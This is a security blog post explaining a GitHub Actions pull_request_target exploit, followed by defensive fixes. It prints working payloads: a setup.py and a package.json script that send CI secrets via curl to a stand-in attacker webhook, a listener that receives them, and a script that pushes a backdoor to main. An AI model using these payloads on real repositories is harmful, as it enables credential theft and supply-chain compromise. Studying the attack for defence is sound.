From Fork to RCE: Deconstructing the Orca Security GitHub Actions Exploit

Following the attacker's path, from creating a malicious fork to exfiltrating API keys and pushing code to protected branches.

Introduction: The Nightmare Hiding in Your CI

Let's be brutally honest for a moment. Your GitHub Actions CI/CD pipeline, the one you've meticulously built to automate, test, and deploy your code, is very likely a gaping security wound. This isn't a theoretical "what if." This is a real, documented exploit path that security researchers at Orca Security, led by Roin Firon (roin-orca), dubbed the "Pull Request Nightmare." And they didn't just find it in a few hobbyist projects; they found this critical vulnerability in the public repositories of giants like Google, Microsoft, and other Fortune-500 companies. If it can happen to them, it's almost certainly happening to you. The flaw is so simple, so subtle, and so deeply rooted in a common developer misunderstanding that it's one of the most dangerous risks in the modern software supply chain.

The entire exploit hinges on a single, misunderstood trigger: pull_request_target. It looks just like its safe cousin, pull_request, but it has one "feature" that changes everything. Unlike pull_request, which safely runs in the context of the fork with no access to your secrets, pull_request_target runs in the context of your base repository. This means it has full, unadulterated access to your GITHUB_TOKEN (which often has write permissions) and every single secret you've stored in your repo's settings, from NPM_TOKEN to AWS_SECRET_KEY. This trigger was intended for harmless meta-tasks like labeling or commenting on PRs. But developers, needing to run tests that require secrets, started using it to check out and run untrusted code. In doing so, they built a perfect, automated backdoor for any attacker on the internet.

The Vulnerable Setup: A Two-Line Time Bomb

The vulnerability isn't complex. It doesn't require a buffer overflow or a 0-day. It's a two-line mistake in a single YAML file. You are vulnerable if any workflow in your .github/workflows directory contains both of these elements:

  1. The Trigger: on: pull_request_target
  2. The Checkout: a step that checks out the untrusted code from the pull request, most commonly via uses: actions/checkout@v4 with ref set to github.event.pull_request.head.sha (or head.ref).

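Put together, a minimal sketch of the vulnerable pattern looks something like this (the workflow name, secret name, and test command are illustrative, not taken from the Orca write-up):

```yaml
# .github/workflows/ci.yml -- DO NOT USE: vulnerable illustration
name: Integration tests

on: pull_request_target        # privileged: runs with base-repo secrets

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # The fatal line: pulls the attacker's fork into the
          # privileged context
          ref: ${{ github.event.pull_request.head.sha }}
      - run: pip install -e . && pytest   # executes untrusted setup.py
        env:
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
```

Either half of this alone is fine; it is the combination of the privileged trigger and the untrusted checkout that arms the bomb.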
Why would any developer, let alone one at a top-tier company, make this mistake? The motive is tragically simple. A developer wants to run their full integration test suite against a PR from a fork. Those tests require secrets—a database connection string, a cloud API key, etc. They quickly discover that the standard pull_request trigger doesn't provide secrets to forks (a critical security feature!). So they search online and find pull_request_target, which does provide secrets. They switch the trigger, add the checkout step to get the PR's code, and voilà, the tests run. They've solved their problem, but in the process, they've just created a public, unauthenticated Remote Code Execution (RCE) vulnerability.

This combination is the digital equivalent of finding a random USB stick in the parking lot and immediately plugging it into your production database server. The pull_request_target trigger provides the privilege (access to secrets) and the actions/checkout step provides the payload (the attacker's untrusted code). The workflow itself becomes the execution engine, dutifully running malicious code on a machine that has all of your keys. The attacker doesn't even have to hide what they are doing. They can create a PR titled "Fix typo" and hide their payload in a build script, knowing the automation will run it before any human ever gets a chance to review the code.

Step 1: The Fork and the Payload

Let's walk through the exact path an attacker takes. First, they are just a user on GitHub. They use GitHub's own search functionality to find vulnerable targets. A query like pull_request_target path:.github/workflows combined with head.sha reveals thousands of potential targets. Once they find your vulnerable repository, the "attack" begins, and it looks just like a normal open-source contribution. They click the "Fork" button. They now have their own copy of your repository.
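That search can also be automated against GitHub's code-search REST API. A hypothetical reconnaissance sketch (it only constructs the request URL; the real API requires an authenticated request and paginated follow-ups):

```python
from urllib.parse import urlencode

# GitHub's code-search endpoint; the query mirrors the web-UI search
# described above. Auth headers omitted -- this only builds the URL.
API = "https://api.github.com/search/code"
query = "pull_request_target path:.github/workflows"

url = f"{API}?{urlencode({'q': query, 'per_page': 100})}"
print(url)
```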

In their fork, they craft their malicious payload. They don't need to touch your application code. They just need to modify a file that they know your CI process will execute. This could be the test script in package.json, a setup.py file, a Makefile, or any build script. The payload itself is shockingly simple. It's just a few lines of script designed to exfiltrate every secret the workflow has access to. Because the workflow runs on a standard runner, it has common tools like curl and bash, and all your secrets are conveniently exposed as environment variables.
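For a Node project, the same exfiltration can hide in a one-line change to the test script in package.json (the webhook URL reuses the one from the Python example below for illustration; jest is just a stand-in for whatever the real suite runs):

```json
{
  "scripts": {
    "test": "curl -s -X POST --data-urlencode \"env=$(env | grep -iE 'token|secret|key|pass')\" https://attacker-webhook-server.com/steal; jest"
  }
}
```

The trailing `; jest` matters: the real tests still run, so the CI check goes green and nothing looks amiss in the PR's status badges.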

Here's what an attacker might add to a Python project's setup.py file:

# In setup.py or a build script that runs during CI
import os
import subprocess
import json

print("--- Malicious payload initiated by attacker ---")
try:
    # All GitHub secrets are exposed as environment variables
    secrets = os.environ
    
    # Filter for valuable keys
    stolen_data = {}
    for key, value in secrets.items():
        if "TOKEN" in key.upper() or "SECRET" in key.upper() or "KEY" in key.upper() or "PASS" in key.upper():
            stolen_data[key] = value
            
    # Use curl to exfiltrate the data to an attacker-controlled server
    # This server is just a simple webhook endpoint
    payload = json.dumps(stolen_data)
    # The 'shell=True' is dangerous, but here it's the attacker running it
    subprocess.run(
        f"curl -X POST -H 'Content-Type: application/json' -d '{payload}' https://attacker-webhook-server.com/steal",
        shell=True
    )
    print("--- Secrets have been exfiltrated ---")
except Exception as e:
    print(f"Payload failed: {e}")

# The script might then continue normally to avoid suspicion
# ... original setup.py content ...

Step 2: The Pull Request and the RCE

The attacker commits their modified setup.py to their fork. Now, for the final, devastating step: they open a pull request from their fork to your repository's main branch. The title can be anything: "Fixing typo in README," "Update dependencies," or "Improve test coverage." The instant they click the "Create pull request" button, your repository's GitHub Actions pipeline springs into action. The pull_request_target trigger fires. It spins up a runner in the context of your repository, complete with all your production and staging secrets loaded into its environment.

The runner proceeds to the jobs section. It hits the vulnerable actions/checkout step and, as instructed, checks out the code from the attacker's PR. It then moves to the next step, like pip install -e . or npm install. This command executes the attacker's modified setup.py or package.json script. The Python script runs, collects all your environment variables containing "TOKEN," "SECRET," and "KEY," and POSTs them to the attacker's webhook. On the other side, the attacker simply watches their server logs. Within seconds, your AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, NPM_TOKEN, and DOCKER_PASSWORD all appear on their screen. This is a full-blown Remote Code Execution (RCE). The attacker has successfully run arbitrary code inside your trusted infrastructure.
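On the receiving end, nothing sophisticated is required. A few lines of Python's standard library are enough to play the role of the attacker's webhook endpoint (a sketch; any hosted request-bin service works just as well):

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

received = []  # decoded JSON bodies, newest last


class StealHandler(BaseHTTPRequestHandler):
    """Stores and logs whatever the payload POSTs at us."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        received.append(json.loads(self.rfile.read(length)))
        self.send_response(200)
        self.end_headers()

    def log_message(self, fmt, *args):
        # One log line per hit -- the attacker just watches this scroll by
        print(f"[+] hit from {self.client_address[0]}: {fmt % args}")


def serve(port=0):
    """Start the listener in the background; port=0 picks a free port."""
    server = HTTPServer(("127.0.0.1", port), StealHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```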

The Aftermath: From Stolen Keys to Repository Takeover

The attack doesn't necessarily end with stolen secrets. As bad as that is—and it's catastrophic, as it can lead to supply chain attacks or massive cloud bills from crypto miners—it can get even worse. Under GitHub's long-standing permissive default, the GITHUB_TOKEN provided to the pull_request_target workflow carries contents: write permission (newer repositories can default the token to read-only, but countless existing ones never changed it). This means the token itself can be used to push code directly to your repository. The attacker's payload doesn't just have to steal secrets; it can actively modify your source code.
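The blast radius of a leaked or abused token depends on what the workflow was granted. A top-level permissions block in the workflow YAML scopes the GITHUB_TOKEN down, so even a successful payload cannot push:

```yaml
# Least-privilege token: applies to every job in this workflow
permissions:
  contents: read        # can clone, cannot push
  pull-requests: write  # only if the workflow must label/comment on PRs
```

This doesn't stop secret exfiltration on its own, but it takes the repository-takeover escalation described next off the table.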

This elevates the attack from data theft to a full repository takeover. An attacker's script, running inside your workflow, can use the provided GITHUB_TOKEN to configure Git, create a new commit—perhaps adding a subtle backdoor to your application's index.js—and push that commit directly to your main branch. No review. No approval. It just appears in your commit history, signed, sealed, and delivered by your own trusted automation. A user pulls the new main, and the backdoor is now on their machine. Your next deployment pushes that backdoor to production. This is the absolute worst-case scenario: the attacker hasn't just broken in; they've changed the locks and now live in the house.

Here's what that payload might look like in a simple shell script:

#!/bin/bash
echo "--- Malicious payload: Pushing to main ---"

# Configure git using the workflow's identity
git config --global user.email "bot@your-org.com"
git config --global user.name "Trusted CI Bot"

# Create a new backdoor file
echo "console.log('--- This is a backdoor ---');" > src/backdoor.js
git add src/backdoor.js
git commit -m "Add critical security patch"

# Use the workflow's GITHUB_TOKEN to push to main. Note that the
# ${{ secrets.GITHUB_TOKEN }} expression syntax only resolves inside the
# workflow YAML; in a standalone script the token must already be exposed
# as an environment variable. Often it doesn't even matter:
# actions/checkout persists the token into .git/config by default
# (persist-credentials: true), so a plain `git push origin HEAD:main`
# can succeed on its own.
git push "https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git" HEAD:main

echo "--- Malicious code pushed to main branch ---"

Conclusion: You've Been Breached, Now What?

The "Pull Request Nightmare" is a brutal lesson in the dangers of "copy-paste" development and misunderstanding the tools we use every day. This isn't a flaw in GitHub Actions; it's a flaw in our implementation, a classic case of using a powerful tool without respecting its security model. The fact that this pattern was found in repositories from the world's top tech companies proves that this is not a "junior developer" mistake. It's a systemic failure. The "brutally honest" truth is that if you have public repositories, you need to stop reading this article and go audit your workflows right now. Use the GitHub search pull_request_target path:.github/workflows and manually inspect every single file that appears.
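For repositories you already have cloned, a local scan is faster than clicking through search results. A rough shell sketch (it flags any workflow that combines the privileged trigger with a PR-head reference; expect some false positives that still deserve a manual read):

```shell
# Flag workflows that pair pull_request_target with a checkout of the
# PR head. Run from the repository root.
scan_workflows() {
  local dir="${1:-.github/workflows}"
  for f in "$dir"/*.yml "$dir"/*.yaml; do
    [ -f "$f" ] || continue
    if grep -q "pull_request_target" "$f" && \
       grep -q "pull_request.head" "$f"; then
      echo "POTENTIALLY VULNERABLE: $f"
    fi
  done
}
```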

If you find this pattern, you are vulnerable. The fix is to never, ever check out untrusted code in a privileged context. A PR from a fork is the very definition of untrusted code. If you must run workflows with secrets, you must put a human gate in place. The most secure methods are to trigger the workflow on a label (on: { pull_request_target: { types: [labeled] } }), which a maintainer only adds after a thorough code review, or to use GitHub Environments, which can be configured to require a manual approval from a reviewer before the job can run and access secrets. Your CI system is a primary target. Treat it like your production environment, because as far as an attacker is concerned, it is.
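A label-gated workflow might look like this (the label name and job contents are illustrative):

```yaml
name: Integration tests (label-gated)

on:
  pull_request_target:
    types: [labeled]

jobs:
  test:
    # Only runs after a maintainer has read the diff and applied the
    # label. Remove the label to re-arm the gate when new commits land.
    if: github.event.label.name == 'safe-to-test'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: pip install -e . && pytest
```

The checkout is still of untrusted code, so the gate only works if maintainers genuinely review every diff before labeling—and re-review after every new push.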